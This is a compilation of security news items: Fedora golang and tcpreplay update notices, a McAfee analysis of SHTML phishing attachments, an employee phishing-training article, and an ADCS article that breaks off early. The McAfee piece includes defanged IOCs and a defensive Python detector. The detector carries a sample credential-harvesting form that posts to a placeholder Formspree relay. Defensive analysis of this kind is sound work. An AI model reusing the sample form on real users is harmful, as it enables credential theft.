golang-1.20.4-1.fc38


FEDORA-2023-7eb5fe654d

Packages in this update:

golang-1.20.4-1.fc38

Update description:

go1.20.4 (released 2023-05-02) includes three security fixes to the html/template package, as well as bug fixes to the compiler, the runtime, and the crypto/subtle, crypto/tls, net/http, and syscall packages. See the milestone on the issue tracker for details.


New Wave of SHTML Phishing Attacks


Authored By Anuradha

McAfee Labs has recently observed a new wave of phishing attacks. In this wave, the attackers abuse server-parsed HTML (SHTML) files. SHTML files are commonly associated with web servers; in this campaign they either redirect users to malicious, credential-stealing websites or display phishing forms locally within the browser to harvest sensitive user information.

SHTML Campaign in the field: 

Figure 1 shows the geographical distribution of McAfee clients that detected malicious SHTML files.

Figure 1. McAfee Client Detection of SHTML

Attackers victimize users by distributing SHTML files as email attachments. The lures used in such phishing emails include payment confirmations, invoices, shipment notices and the like. The email contains a short thread of messages to make the recipient more curious to open the attachment.

Figure 2. Email with SHTML attachment

Analysis: 

When the SHTML attachment is opened, it displays a blurred fake document with a login page in the browser, as shown in Figure 3. To read the document, however, the user must enter their credentials. In some cases, the email address is prefilled.

Figure 3. Fake PDF document

Figure 4. Fake Excel document

Figure 5. Fake DHL Shipping document

Attackers commonly use JavaScript in the SHTML attachments, either to generate the malicious phishing form, to redirect the user, or to hide malicious URLs and behavior.

Figure 6. SHTML with JavaScript code

The code snippet in Figure 7 shows how the blurred background image is loaded. The blurred images are hosted on legitimate websites such as:

https://isc.sans.edu

https://i.gyazo.com

Figure 7. Code to load blurred image

Abusing submission form services:

Phishing attacks abuse static form service providers, such as Formspree and Formspark, to steal sensitive user information.

Formspree.io is a back-end service that lets developers add forms to their website without writing server-side code; it also handles form processing and storage. It takes HTML form submissions and sends the results to an email address.

The attackers use a formspree.io URL as the form's action URL, which defines where the form data is sent. Figure 8 below shows the code snippet for the action URL, used together with the POST method.

Figure 8. Formspree.io as action URL with POST method

When the user enters the credentials and hits the "submit" button, the data is sent to Formspree.io. Formspree.io then forwards the information to the specified email address. Figure 9 below shows the flow of user submission data from the webpage to the attacker's email address.

Figure 9. Flow of user submission data 
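As an added example (not McAfee's code) of how a mail gateway or triage script could flag attachments showing the traits described above, the Python below parses an HTML/SHTML attachment and reports a POST form whose action points at a form-relay host, a password field, and a remotely loaded image; the relay-host list, the function names and the sample attachment are constructed for this example.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Relay host named in the post; add others seen in your environment (assumption).
FORM_RELAY_HOSTS = {"formspree.io"}


class AttachmentScanner(HTMLParser):
    """Records the traits described above: a POST form whose action is a
    third-party form relay, a password field, and a remotely loaded image."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        if tag == "form":
            host = (urlparse(a.get("action", "")).hostname or "").lower()
            if a.get("method", "get").lower() == "post" and host in FORM_RELAY_HOSTS:
                self.findings.append(f"form posts to relay {host}")
        elif tag == "input" and a.get("type", "").lower() == "password":
            self.findings.append("password field")
        elif tag == "img" and a.get("src", "").startswith("http"):
            self.findings.append(f"remote image from {urlparse(a['src']).hostname}")


def scan_attachment(html):
    """Return the suspicious traits found in one HTML/SHTML attachment."""
    scanner = AttachmentScanner()
    scanner.feed(html)
    return scanner.findings


def is_credential_phish(html):
    """Gateway verdict: a relay-bound POST form plus a password field is the
    combination this campaign relies on, enough to quarantine the attachment."""
    found = scan_attachment(html)
    return "password field" in found and any(f.startswith("form posts to relay") for f in found)


# Constructed sample resembling the attachment described above (not a real IoC).
SAMPLE_ATTACHMENT = """<html><body>
<img src="https://example.com/blurred-invoice.png" style="filter:blur(4px)">
<form method="POST" action="https://formspree.io/f/EXAMPLEID">
  <input type="email" name="email" value="user@example.com">
  <input type="password" name="password">
  <button type="submit">View Document</button>
</form></body></html>"""
```

A legitimate attachment with no form, or a form that posts back to the sender's own site, yields only the remote-image finding and is not quarantined; tune the host list to the relay services your organization actually uses.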


Known malicious forms may be blocked, preventing the submitted data from reaching the attacker. Figure 10 below shows a form blocked due to suspected fraudulent activity.

Figure 10. Form Blocked

To prevent the user from recognizing that they have just been phished, the attacker redirects the user's browser to an unrelated error page associated with a legitimate website.

Figure 11 below shows the redirected webpage.

Figure 11. Redirected webpage

To conclude, phishing is a form of social engineering in which attackers trick people into disclosing confidential information or installing malware. It is a widespread and pervasive problem. This blurry-image phishing scam uses simple HTML and JavaScript code, but it can still be effective: a blurry image is enough to trick many users into believing the email is legitimate. To stay protected, users should keep their systems up to date and refrain from clicking links or opening SHTML attachments that arrive by email from untrusted sources.

IOCs 

McAfee customers are protected against this phishing campaign. 


Type | Value | Product | Detected
URL | formspree[.]io/f/xjvderkn | McAfee WebAdvisor | Blocked
URL | cianindustries[].com/error/excel.php | McAfee WebAdvisor | Blocked
URL | twenty88[.]com/mincs/mea.ph | McAfee WebAdvisor | Blocked
URL | sweet.classicbo[.]com/mailb_fixpd.ph | McAfee WebAdvisor | Blocked

Type | Value | Product | Detected
shtml(Adobe) | 0a072e7443732c7bdb9d1f3fdb9ee27c | Total Protection and LiveSafe | HTML/Phishing.qz
shtml(Excel) | 3b215a37c728f65c167941e788935677 | Total Protection and LiveSafe | HTML/Phishing.rb
shtml(DHL) | 257c1f7a04c93a44514977ec5027446c | Total Protection and LiveSafe | HTML/Phishing.qz

The post New Wave of SHTML Phishing Attacks appeared first on McAfee Blog.


Preventing sophisticated phishing attacks aimed at employees


The content of this post is solely the responsibility of the author.  AT&T does not adopt or endorse any of the views, positions, or information provided by the author in this article. 

As technology advances, phishing attempts are becoming more sophisticated. It can be challenging for employees to recognize an email is malicious when it looks normal, so it’s up to their company to properly train workers in prevention and detection.

Phishing attacks are becoming more sophisticated

Misspellings and poorly formatted text used to be the leading indicators of an email scam, but scams are getting more sophisticated. Today, hackers can spoof email addresses, and bots sound like humans. It is becoming challenging for employees to tell whether their emails are real or fake, which puts the company at risk of data breaches.

In March 2023, an artificial intelligence chatbot called GPT-4 received an update that lets users give specific instructions about styles and tasks. Attackers can use it to pose as employees and send convincing messages since it sounds intelligent and has general knowledge of any industry.

Since classic warning signs of phishing attacks aren’t applicable anymore, companies should train all employees on the new, sophisticated methods. As phishing attacks change, so should businesses.

Identify the signs

Your company can take preventive action to secure its employees against attacks. You need to make it difficult for hackers to reach them, and your company must train them on the warning signs. While blocking spam senders and reinforcing security systems is up to you, employees must know how to identify and report attacks themselves.

You can prevent data breaches if employees know what to watch out for:

Misspellings: While it’s becoming more common for phishing emails to have the correct spelling, employees still need to look for mistakes. For example, they could look for industry-specific language because everyone in their field should know how to spell those words.
Irrelevant senders: Workers can identify phishing — even when the email is spoofed to appear as someone they know — by asking themselves if it is relevant. They should flag the email as a potential attack if the sender doesn’t usually reach out to them or is someone in an unrelated department.
Attachments: Hackers attempt to install malware through links or downloads. Ensure every employee knows they shouldn’t click on them.
Odd requests: A sophisticated phishing attack has relevant messages and proper language, but it is somewhat vague because it goes to multiple employees at once. For example, they could recognize it if it’s asking them to do something unrelated to their role.

It may be harder for people to detect warning signs as attacks evolve, but you can prepare them for those situations as well as possible. It’s unlikely hackers have access to their specific duties or the inner workings of your company, so you must capitalize on those details.

Sophisticated attacks will sound intelligent and possibly align with their general duties, so everyone must constantly be aware. Training will help employees identify signs, but you need to take more preventive action to ensure you’re covered.

Take preventive action

Basic security measures — like regularly updating passwords and running antivirus software — are fundamental to protecting your company. For example, everyone should change their passwords once every three months at minimum to ensure hackers have limited access even if their phishing attempt is successful.

Training ensures employees are prepared since they’re often highly susceptible to attacks. The cybersecurity team can create phishing simulations to mimic actual threats. For example, they send emails with fake links and track how many people click them. If anyone does, you can retrain them on proper behavior to ensure it doesn’t happen again. With attacks becoming more intelligent, preparing the company for everything is essential.

Know how you’ll respond

You can remain protected even when phishing attacks are successful as long as you have the proper security measures in place. For example, out of the 1,800 emails one company received during an attack, 14 employees clicked the link because they didn’t notice the warning signs. Even though the malware was set to install, almost every device remained unaffected because they were updated and secured. The company detected malicious software on the one that wasn’t secured and fixed the issue within hours.

Training can’t prevent every employee from clicking on malicious links or attachments, so you must have a proper response. You can still prevent attacks at this stage if you and your company’s employees know what comes next.

Updated security software and procedures will protect against sophisticated phishing attacks:

Reporting: Ensure everyone knows how to report to you so you can react quickly to the potential threat. They must also be able to recognize the signs that they have clicked on a malicious attachment.
Prevention: Software that blocks malware from being downloaded will prevent the attack from being successful.
Detection: Employees must identify if their hardware is being affected and detection software must alert you of a successful breach.
Response: You should clean any affected hardware immediately to stop the attack from doing damage.

Sophisticated phishing attacks aren't avoidable, but you can minimize their effects if you manage your response. Employees who click a link believing it is legitimate are unlikely to recognize that the email is malicious, so you must train them on the appropriate identification and detection.

Avoid sophisticated phishing attacks

Training and simulated phishing attempts will help protect your company. Updated passwords and security systems will also make your systems more secure. You can prevent sophisticated attacks targeting employees if employees know how to recognize warning signs and the proper procedures.


Review your on-prem ADCS infrastructure before attackers do it for you


Attackers love to find weak spots in our domains and networks. Too often, they can enter systems to lie in wait and launch attacks at a later time. A case in point is the infamous SolarWinds software attack, which infected up to nine US agencies and many organizations with backdoors into their infrastructure. 

Recent investigations show that the Department of Justice may have been aware of the potential for a breach months before it happened. Prior to purchasing the affected software, a trial was installed on sample servers, and network administrators appear to have been concerned and raised questions when unusual traffic came from one of the servers. Investigators were brought in to examine the situation, but no one understood the significance until months later.


tcpreplay-4.4.3-3.el8


FEDORA-EPEL-2023-6463a51c68

Packages in this update:

tcpreplay-4.4.3-3.el8

Update description:

Patch CVE-2023-27783 – CVE-2023-27789

CVE-2023-27783
CVE-2023-27784
CVE-2023-27785
CVE-2023-27786
CVE-2023-27787
CVE-2023-27788
CVE-2023-27789


tcpreplay-4.4.3-3.fc36


FEDORA-2023-7ffeed7339

Packages in this update:

tcpreplay-4.4.3-3.fc36

Update description:

Patch CVE-2023-27783 – CVE-2023-27789

CVE-2023-27783
CVE-2023-27784
CVE-2023-27785
CVE-2023-27786
CVE-2023-27787
CVE-2023-27788
CVE-2023-27789


tcpreplay-4.4.3-3.el7


FEDORA-EPEL-2023-7f7029b90d

Packages in this update:

tcpreplay-4.4.3-3.el7

Update description:

Patch CVE-2023-27783 – CVE-2023-27789

CVE-2023-27783
CVE-2023-27784
CVE-2023-27785
CVE-2023-27786
CVE-2023-27787
CVE-2023-27788
CVE-2023-27789


tcpreplay-4.4.3-3.fc38


FEDORA-2023-37bdea9241

Packages in this update:

tcpreplay-4.4.3-3.fc38

Update description:

Patch CVE-2023-27783 – CVE-2023-27789

CVE-2023-27783
CVE-2023-27784
CVE-2023-27785
CVE-2023-27786
CVE-2023-27787
CVE-2023-27788
CVE-2023-27789
